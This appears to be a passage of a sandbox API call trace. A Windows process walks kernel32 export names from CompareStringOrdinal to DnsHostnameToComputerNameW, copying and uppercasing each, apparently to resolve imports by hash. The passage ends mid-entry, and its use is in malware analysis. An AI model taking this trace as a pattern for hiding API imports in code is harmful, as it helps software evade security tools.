[0030.582] lstrcpyA (in: lpString1=0xc9ea74, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0030.582] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0030.582] lstrcpyA (in: lpString1=0xc9ea74, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0030.582] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0030.582] lstrcpyA (in: lpString1=0xc9ea74, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0030.582] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0030.582] lstrcpyA (in: lpString1=0xc9ea74, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0030.582] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0030.582] lstrcpyA (in: lpString1=0xc9ea74, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0030.582] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0030.582] lstrcpyA (in: lpString1=0xc9ea74, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0030.582] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0030.582] lstrcpyA (in: lpString1=0xc9ea74, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0030.582] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0030.583] lstrcpyA (in: lpString1=0xc9ea74, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0030.583] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0030.583] lstrcpyA (in: lpString1=0xc9ea74, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0030.583] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0030.583] lstrcpyA (in: lpString1=0xc9ea74, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0030.583] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0030.583] lstrcpyA (in: lpString1=0xc9ea74, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0030.583] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0030.583] lstrcpyA (in: lpString1=0xc9ea74, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0030.583] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0030.583] lstrcpyA (in: lpString1=0xc9ea74, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0030.583] lstrlenA (lpString="COPYCONTEXT") returned 11 [0030.583] lstrcpyA (in: lpString1=0xc9ea74, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0030.583] lstrlenA (lpString="COPYFILEA") returned 9 [0030.583] lstrcpyA (in: lpString1=0xc9ea74, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0030.583] lstrlenA (lpString="COPYFILEEXA") returned 11 [0030.583] lstrcpyA (in: lpString1=0xc9ea74, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0030.583] lstrlenA (lpString="COPYFILEEXW") returned 11 [0030.583] lstrcpyA (in: lpString1=0xc9ea74, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0030.583] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0030.583] lstrcpyA (in: lpString1=0xc9ea74, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0030.583] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0030.583] lstrcpyA (in: lpString1=0xc9ea74, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0030.583] lstrlenA (lpString="COPYFILEW") returned 9 [0030.583] lstrcpyA (in: lpString1=0xc9ea74, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0030.583] lstrlenA (lpString="COPYLZFILE") returned 10 [0030.583] lstrcpyA (in: lpString1=0xc9ea74, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0030.583] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0030.583] lstrcpyA (in: lpString1=0xc9ea74, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0030.583] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0030.583] lstrcpyA (in: lpString1=0xc9ea74, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0030.583] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0030.583] lstrcpyA (in: lpString1=0xc9ea74, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0030.583] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0030.584] lstrcpyA (in: lpString1=0xc9ea74, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0030.584] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0030.584] lstrcpyA (in: lpString1=0xc9ea74, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0030.584] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0030.584] lstrcpyA (in: lpString1=0xc9ea74, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0030.584] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0030.584] lstrcpyA (in: lpString1=0xc9ea74, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0030.584] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0030.584] lstrcpyA (in: lpString1=0xc9ea74, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0030.584] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0030.584] lstrcpyA (in: lpString1=0xc9ea74, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0030.584] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0030.584] lstrcpyA (in: lpString1=0xc9ea74, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0030.584] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0030.584] lstrcpyA (in: lpString1=0xc9ea74, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0030.584] lstrlenA (lpString="CREATEEVENTA") returned 12 [0030.584] lstrcpyA (in: lpString1=0xc9ea74, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0030.584] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0030.584] lstrcpyA (in: lpString1=0xc9ea74, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0030.584] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0030.584] lstrcpyA (in: lpString1=0xc9ea74, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0030.584] lstrlenA (lpString="CREATEEVENTW") returned 12 [0030.584] lstrcpyA (in: lpString1=0xc9ea74, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0030.584] lstrlenA (lpString="CREATEFIBER") returned 11 [0030.584] lstrcpyA (in: lpString1=0xc9ea74, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0030.584] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0030.584] lstrcpyA (in: lpString1=0xc9ea74, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0030.584] lstrlenA (lpString="CREATEFILEA") returned 11 [0030.584] lstrcpyA (in: lpString1=0xc9ea74, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0030.584] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0030.584] lstrcpyA (in: lpString1=0xc9ea74, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0030.584] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0030.584] lstrcpyA (in: lpString1=0xc9ea74, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0030.585] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0030.585] lstrcpyA (in: lpString1=0xc9ea74, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0030.585] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0030.585] lstrcpyA (in: lpString1=0xc9ea74, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0030.585] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0030.585] lstrcpyA (in: lpString1=0xc9ea74, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0030.585] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0030.585] lstrcpyA (in: lpString1=0xc9ea74, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0030.585] lstrlenA (lpString="CREATEFILEW") returned 11 [0030.585] lstrcpyA (in: lpString1=0xc9ea74, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0030.585] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0030.585] lstrcpyA (in: lpString1=0xc9ea74, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0030.585] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0030.585] lstrcpyA (in: lpString1=0xc9ea74, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0030.585] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0030.585] lstrcpyA (in: lpString1=0xc9ea74, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0030.585] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0030.585] lstrcpyA (in: lpString1=0xc9ea74, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0030.585] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0030.585] lstrcpyA (in: lpString1=0xc9ea74, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0030.585] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0030.585] lstrcpyA (in: lpString1=0xc9ea74, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0030.585] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0030.585] lstrcpyA (in: lpString1=0xc9ea74, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0030.585] lstrlenA (lpString="CREATEJOBSET") returned 12 [0030.585] lstrcpyA (in: lpString1=0xc9ea74, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0030.585] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0030.585] lstrcpyA (in: lpString1=0xc9ea74, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0030.585] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0030.585] lstrcpyA (in: lpString1=0xc9ea74, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0030.585] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0030.585] lstrcpyA (in: lpString1=0xc9ea74, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0030.585] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0030.586] lstrcpyA (in: lpString1=0xc9ea74, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0030.586] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0030.586] lstrcpyA (in: lpString1=0xc9ea74, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0030.586] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0030.586] lstrcpyA (in: lpString1=0xc9ea74, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0030.586] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0030.586] lstrcpyA (in: lpString1=0xc9ea74, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0030.586] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0030.586] lstrcpyA (in: lpString1=0xc9ea74, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0030.586] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0030.586] lstrcpyA (in: lpString1=0xc9ea74, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0030.586] lstrlenA (lpString="CREATEPIPE") returned 10 [0030.586] lstrcpyA (in: lpString1=0xc9ea74, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0030.586] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0030.586] lstrcpyA (in: lpString1=0xc9ea74, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0030.586] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0030.586] lstrcpyA (in: lpString1=0xc9ea74, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0030.586] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0030.586] lstrcpyA (in: lpString1=0xc9ea74, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0030.586] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0030.586] lstrcpyA (in: lpString1=0xc9ea74, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0030.586] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0030.586] lstrcpyA (in: lpString1=0xc9ea74, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0030.586] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0030.586] lstrcpyA (in: lpString1=0xc9ea74, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0030.586] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0030.586] lstrcpyA (in: lpString1=0xc9ea74, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0030.586] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0030.586] lstrcpyA (in: lpString1=0xc9ea74, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0030.586] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0030.586] lstrcpyA (in: lpString1=0xc9ea74, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0030.586] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0030.586] lstrcpyA (in: lpString1=0xc9ea74, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0030.587] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0030.587] lstrcpyA (in: lpString1=0xc9ea74, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0030.587] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0030.587] lstrcpyA (in: lpString1=0xc9ea74, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0030.587] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0030.587] lstrcpyA (in: lpString1=0xc9ea74, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0030.587] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0030.587] lstrcpyA (in: lpString1=0xc9ea74, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0030.587] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0030.587] lstrcpyA (in: lpString1=0xc9ea74, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0030.587] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0030.587] lstrcpyA (in: lpString1=0xc9ea74, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0030.587] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0030.587] lstrcpyA (in: lpString1=0xc9ea74, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0030.587] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0030.587] lstrcpyA (in: lpString1=0xc9ea74, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0030.587] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0030.587] lstrcpyA (in: lpString1=0xc9ea74, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0030.587] lstrlenA (lpString="CREATETHREAD") returned 12 [0030.587] lstrcpyA (in: lpString1=0xc9ea74, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0030.587] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0030.587] lstrcpyA (in: lpString1=0xc9ea74, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0030.587] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0030.587] lstrcpyA (in: lpString1=0xc9ea74, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0030.587] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0030.587] lstrcpyA (in: lpString1=0xc9ea74, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0030.587] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0030.587] lstrcpyA (in: lpString1=0xc9ea74, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0030.587] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0030.587] lstrcpyA (in: lpString1=0xc9ea74, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0030.587] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0030.587] lstrcpyA (in: lpString1=0xc9ea74, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0030.587] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0030.587] lstrcpyA (in: lpString1=0xc9ea74, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0030.588] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0030.588] lstrcpyA (in: lpString1=0xc9ea74, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0030.588] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0030.588] lstrcpyA (in: lpString1=0xc9ea74, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0030.588] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0030.588] lstrcpyA (in: lpString1=0xc9ea74, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0030.588] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0030.588] lstrcpyA (in: lpString1=0xc9ea74, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0030.588] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0030.588] lstrcpyA (in: lpString1=0xc9ea74, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0030.588] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0030.588] lstrcpyA (in: lpString1=0xc9ea74, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0030.588] lstrlenA (lpString="CTRLROUTINE") returned 11 [0030.588] lstrcpyA (in: lpString1=0xc9ea74, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0030.588] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0030.588] lstrcpyA (in: lpString1=0xc9ea74, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0030.588] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0030.589] lstrcpyA (in: lpString1=0xc9ea74, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0030.589] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0030.589] lstrcpyA (in: lpString1=0xc9ea74, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0030.589] lstrlenA (lpString="DEBUGBREAK") returned 10 [0030.589] lstrcpyA (in: lpString1=0xc9ea74, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0030.589] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0030.589] lstrcpyA (in: lpString1=0xc9ea74, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0030.589] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0030.589] lstrcpyA (in: lpString1=0xc9ea74, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0030.589] lstrlenA (lpString="DECODEPOINTER") returned 13 [0030.589] lstrcpyA (in: lpString1=0xc9ea74, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0030.589] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0030.589] lstrcpyA (in: lpString1=0xc9ea74, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0030.589] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0030.589] lstrcpyA (in: lpString1=0xc9ea74, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0030.589] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0030.589] lstrcpyA (in: lpString1=0xc9ea74, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0030.589] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0030.589] lstrcpyA (in: lpString1=0xc9ea74, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0030.589] lstrlenA (lpString="DELETEATOM") returned 10 [0030.589] lstrcpyA (in: lpString1=0xc9ea74, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0030.589] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0030.589] lstrcpyA (in: lpString1=0xc9ea74, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0030.589] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0030.589] lstrcpyA (in: lpString1=0xc9ea74, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0030.589] lstrlenA (lpString="DELETEFIBER") returned 11 [0030.589] lstrcpyA (in: lpString1=0xc9ea74, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0030.589] lstrlenA (lpString="DELETEFILEA") returned 11 [0030.589] lstrcpyA (in: lpString1=0xc9ea74, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0030.589] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0030.589] lstrcpyA (in: lpString1=0xc9ea74, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0030.589] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0030.589] lstrcpyA (in: lpString1=0xc9ea74, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0030.589] lstrlenA (lpString="DELETEFILEW") returned 11 [0030.590] lstrcpyA (in: lpString1=0xc9ea74, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0030.590] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0030.590] lstrcpyA (in: lpString1=0xc9ea74, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0030.590] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0030.590] lstrcpyA (in: lpString1=0xc9ea74, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0030.590] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0030.590] lstrcpyA (in: lpString1=0xc9ea74, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0030.590] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0030.590] lstrcpyA (in: lpString1=0xc9ea74, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0030.590] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0030.590] lstrcpyA (in: lpString1=0xc9ea74, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0030.590] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0030.590] lstrcpyA (in: lpString1=0xc9ea74, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0030.590] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0030.590] lstrcpyA (in: lpString1=0xc9ea74, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0030.590] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0030.590] lstrcpyA (in: lpString1=0xc9ea74, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0030.590] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0030.590] lstrcpyA (in: lpString1=0xc9ea74, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0030.590] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0030.590] lstrcpyA (in: lpString1=0xc9ea74, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0030.590] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0030.590] lstrcpyA (in: lpString1=0xc9ea74, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0030.590] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0030.590] lstrcpyA (in: lpString1=0xc9ea74, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0030.590] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0030.590] lstrcpyA (in: lpString1=0xc9ea74, lpString2="DosDateTimeToFileTime" | out: 